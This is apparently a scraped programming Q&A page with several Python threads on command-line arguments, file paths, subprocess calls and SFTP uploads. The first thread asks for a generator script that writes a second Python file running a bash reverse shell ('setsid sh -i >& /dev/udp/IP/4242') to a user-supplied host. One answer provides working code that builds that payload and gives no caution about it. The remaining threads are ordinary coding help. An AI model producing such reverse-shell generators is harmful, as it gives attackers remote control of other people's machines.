I have code similar to this
ip = input("Enter IP: ")
I need to make it after receving ip create new python file with this commands
import os
os.system('/bin/bash -c "setsid
sh -i >& /dev/udp/"ip"/4242
0>&1"')
And instead of "ip" I need it to write ip that user entered
And second script shouldn't ask for input, it should take data from first
You could do it with the following script:
ip = input("Enter IP: ")
bash_script = f"/bin/bash -c 'setsid sh -i >& /dev/udp/{ip}/4242 0>&1'"
other_python_script = f"""
import os
os.system(\"""{bash_script}\""")
"""
with open("otherscript.py", "w") as python_script_file:
python_script_file.write(other_python_script)
Well, what is happening there?
First, I write the ip value in the string containing the bash script using the f-string and stores it in bash_script
Then, I use f-string to write the bash_script inside the python code string that will be inside the python file. This string is stored in the other_python_script variable.
Lastly, I just write the python code string in a file called otherscript.py.
And you will have a python file with the code you want.
You could do the first and second steps in on the same line. I separated into two lines of code for a matter of clarity. And this code works only in python 3.6^. Older versions should use other methods for write values into strings.
Hopefully, this helps, please let me know if you need anything below explained.
import os
path = yourPathHere // insert your filePath here without the fileName itself
ip = input('insert ip address here: ') // this will contain the ip address
if not os.path.exists(path): // checks if the path does exist, if not
os.makedirs(path) // make it
// this is a formatted string with the ip variable inside of it
pyFileContent = f'whatever/content/you/want/to/put/{ip}/whatever/else'
// creates a string of the name of your .py file
filename = 'yourPythonFileNameHere' + '.py'
// this joins the name of filename.py and path, creates and opens it
with open(os.path.join(path, filename), 'w') as my_file:
my_file.write(pyFileContent) // writes the content inside of it then closes
Related
I have the below python script which takes a user input that is eventually used by the program to read a particular file.
I want to execute the python program from batch script and pass the file_name in the batch script. Can someone please help?
file_name = input("Input File Name to Compare: ")
path = ("outward\\" + file_name)
import sys
file_name = sys.argv[1]
path = "outward\\" + file_name
and you pass it to your script like:
$ python script.py filename.ext
To run the Python program from the batch script and pass the filename into the batch script, you need to use sys, so:
import sys
sys.argv is automatically a list of strings representing arguments on the command line. You can use this as an input for your program. Represents the first command line argument (like a string) given to the script in question.
The lists are indexed by numbers based on zero, so you can get the individual items using the syntax [0]. To get the script name, you need to get the first argument after the script for a filename, so:
filename = sys.argv[1]
path = "outward\\" + file_name
Next you need to pass it to your script like this:
$ python your_script.py filename.ext
(not to be confused with .ext with .text)
Your complete code for the solution to the question, quite simply, will be:
import sys
filename = sys.argv[1]
path = "outward\\" + file_name
and
$ python your_script.py filename.ext
You could use the sys.argv Python function.
The idea would be to get the input from the user in the batch file, then execute the Python program from the batch file while passing the user input as a command line argument to the python file. Example:
batchfile.bat
#echo off
set /p file="Enter Filename: "
python /path/to/program/pythonprogram.py %file%
pythonprogram.py
import sys
sys.argv[0] = file_name
path = ("outward\\" + file_name)
Now, when you execute the batch file, it will prompt for user input of a filename. Then, it will execute the Python program while passing the filename as a command-line argument to the Python file. Then using the sys.argv function you can collect the argument.
I have a program that relies on user input to enter files for the program to open in Python 2.7.11. I have all of those files in a sub-directory called TestCases within the original directory Detector, but I can't seem to access the files in TestCases when running the program from the super-directory. I tried to use os.path.join but to of no avail. Here is my code:
import os.path
def __init__(self):
self.file = None
os.path.join('Detector', 'TestCases')
while self.file == None:
self.input = raw_input('What file to open? ')
try:
self.file = open(self.input, 'r')
except:
print "Can't find file."
My terminal when I run the program goes as follows:
>>> What file to open? test.txt # From the TestCases directory
>>> Can't find file.
>>> What file to open? ...
Am I using os.path.join incorrectly? I thought it was supposed to link the two directories so that files could be accessed from the sub-directory while running the program from the super-directory.
You are using os.path.join('Detector', 'TestCases'), that should return 'Detector/TestCases', but you aren't storing that variable anywhere.
I suppose that you are in Detector directory and you want to open files in TestCases. I that case you can use path join (It concatenates its arguments and RETURNS the result):
import os.path
file = None
while not file:
input = raw_input('What file to open? ')
try:
filepath = os.path.join('TestCases', input)
file = open(filepath, 'r')
except IOError:
print "Can't find " + input
I have stored the result of os.path.join so you could see that it doesn't change the directory, it just concatenates its arguments, maybe you was thinking that function will change the directory, you can do it with os.chdir.
Try it first in a simple script or in the terminal, it will save many headaches.
The documentation about os.path.join
Join one or more path components intelligently. The return value is the concatenation of path...
It seems like you expect it to set some kind of PATH variable or affect the current working directory. For a first start it should be sufficient to add something like this to your code:
open(os.path.join("TestCases",self.input), 'r')
1. Introduction
I have a bunch of files in netcdf format.
Each file contain the meteorology condition of somewhere in different period(hourly data).
I need to extract the first 12 h data for each file. So I select to use NCO(netcdf operator) to deal with.
NCO works with terminal environment. With >ncks -d Time 0,11 input.nc output.nc, I can get one datafile called out.ncwhich contain the first 12h data of in.nc.
2. My attempt
I want to keep all the process inside my ipython notebook. But I stuck on two aspects.
How to execute terminal code in python loop
How to transfer the string in python into terminal code.
Here is my fake code for example.
files = os.listdir('.')
for file in files:
filename,extname = os.path.splitext(file)
if extname == '.nc':
output = filename + "_0-12_" + extname
## The code below was my attempt
!ncks -d Time 0,11 file output`
3. Conclusion
Basically, my target was letting the fake code !ncks -d Time 0,11 file output coming true. That means:
execute netcdf operator directly in python loop...
...using filename which is an string in python environment.
Sorry for my unclear question. Any advice would be appreciated!
You can use subprocess.check_output to execute external program:
import glob
import subprocess
for fn in glob.iglob('*.nc'):
filename, extname = os.path.splitext(fn)
output_fn = filename + "_0-12_" + extname
output = subprocess.call(['ncks', '-d', 'Time', '0,11', fn, output_fn])
print(output)
NOTE: updated the code to use glob.iglob; you don't need to check extension manually.
You may also check out pynco which wraps the NCO with subprocess calls, similar to #falsetru's answer. Your application may look something like
nco = Nco()
for fn in glob.iglob('*.nc'):
filename, extname = os.path.splitext(fn)
output_fn = filename + "_0-12_" + extname
nco.ncks(input=filename, output=output_fn, dimension='Time 0,11')
I'm pretty new to python programming, and I wrote a script to automate uploading a file via SFTP to a remote machine. The script works wonderfully, but there is an issue that I can't seem to figure out. If I'm in the directory in which the file I'm trying to upload is residing, everything goes fine. But, when I type the filename that is not residing in said directory, it doesn't like that. It's a hassle having to browse to different folders each time. I know I can consolidate the files into one folder... But I would love to try and automate this.
The /Downloads directory is hard-coded since that's where most tools reside, does anyone know how I can tweak this line of code to grab the matching file name regardless of the directory the file resides in?
This is what I've written:
#! /usr/bin/python2
# includes
import thirdpartylib
import sys
if len(sys.argv) != 6:
print "Usage: %s file url port username password" % sys.argv[0]
exit(0)
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
username = sys.argv[4]
password = sys.argv[5]
filelocation = "Downloads/%s" % file
transport = thirdpartylib.Transport((host, port))
transport.connect(username=username, password=password)
sftp = thirdpartylib.SFTPClient.from_transport(transport)
sftp.put(file, filelocation)
sftp.close()
transport.close()
First of all, if you're doing any work with filepaths it is recommended that you use some built-in functionality to construct them to ensure that you have proper file separators etc. os.path.join is great for this.
That being said, I would recommend having the user pass in the file path as either an absolute path (in which case it can live anywhere on the machine) or a relative path (in which case it is relative to the current directory). I would not append Downloads/ to all the file paths as that obviously breaks any absolute paths and it requires the individual calling your program to know the internals of it. I think of this as the file path equivalent of a magic number.
So what that boils down to changing the filelocation to simply be the file input argument itself.
filelocation = sys.argv[1]
# You can even do some validation if you want
is not os.path.isfile(filelocation):
print "File '%s' does not exist!" % filelocation
If you really want that Downloads/ folder to be the default (if the file path isn't an absolute path), you can check to see if the input is an absolute path (using os.path.isabs) and if it's not, then specify that it's in the Downloads/ directory.
if not os.path.isabs(filelocation):
filelocation = os.path.join('Downloads', filelocation)
Then users could call your script in two ways:
# Loads file in /absolute/path/to/file
./script.py /absolute/path/to/file ...
# Loads filename.txt from Downloads/filename.txt
./script.py filename.txt ...
Also, it looks like you may have your sftp.put input arguments reversed. The local filename should come first.
I think you want filelocation as the first argument to stfp.put, as that is supposed to be the filename on the local machine. Also, you probably want to put a slash in front of Downloads.
I have a python script that processes an XML file each day (it is transferred via SFTP to a remote directory, then temporarily copied to a local directory) and stores its information in a MySQL database.
One of my parameters for the file is set to "date=today" so that the correct file is processed each day. This works fine and each day I successfully store new file information into the database.
What I need help on is passing a Linux command line argument to run a file for a specific day (in case a previous day's file needs to be rerun). I can manually edit my code to make this work but this will not be an option once the project is in production.
In addition, I need to be able to pass in a command line argument for "date=*" and have the script run every file in my remote directory. Currently, this parameter will successfully process only a single file based on alphabetic priority.
If my two questions should be asked separately, my mistake, and I'll edit this question to just cover one of them. Example of my code below:
today = datetime.datetime.now().strftime('%Y%m%d')
file_var = local_file_path + connect_to_sftp.sftp_get_file(
local_file_path=local_file_path,
sftp_host=sftp_host,
sftp_username=sftp_username,
sftp_directory=sftp_directory,
date=today)
ET = xml.etree.ElementTree.parse(file_var).getroot()
def parse_file():
for node in ET.findall(.......)
In another module:
def sftp_get_file(local_file_path, sftp_host, sftp_username, sftp_directory, date):
pysftp.Connection(sftp_host, sftp_username)
# find file in remote directory with given suffix
remote_file = glob.glob(sftp_directory + '/' + date + '_file_suffix.xml')
# strip directory name from full file name
file_name_only = remote_file[0][len(sftp_directory):]
# set local path to hold new file
local_path = local_file_path
# combine local path with filename that was loaded
local_file = local_path + file_name_only
# pull file from remote directory and send to local directory
shutil.copyfile(remote_file[0], local_file)
return file_name_only
So the SFTP module reads the file, transfers it to the local directory, and returns the file name to be used in the parsing module. The parsing module passes in the parameters and does the rest of the work.
What I need to be able to do, on certain occasions, is override the parameter that says "date=today" and instead say "date=20151225", for example, but I must do this through a Linux command line argument.
In addition, if I currently enter the parameter of "date=*" it only runs the script for the first file that matches that parameter. I need the script to run for ALL files that match that parameter. Any help is much appreciated. Happy to answer any questions to improve clarity.
You can use sys module and pass the filename as command line argument.
That would be :
import sys
today = str(sys.argv[1]) if len(sys.argv) > 1 else datetime.datetime.now().strftime('%Y%m%d')
If the name is given as first argument, then today variable will be filename given from command line otherwise if no argument is given it will be what you specified as datetime.
For second question,
file_name_only = remote_file[0][len(sftp_directory):]
You are only accessing the first element, but glob might return serveral files when you use * wildcard. You must iterate over remote_file variable and copy all of them.
You can use argsparse to consume command line arguments. You will have to check if specific date is passed and use it instead of the current date
if args.date_to_run:
today = args.date_to_run
else:
today = datetime.datetime.now().strftime('%Y%m%d')
For the second part of your question you can use something like https://docs.python.org/2/library/fnmatch.html to match multiple files based on a pattern.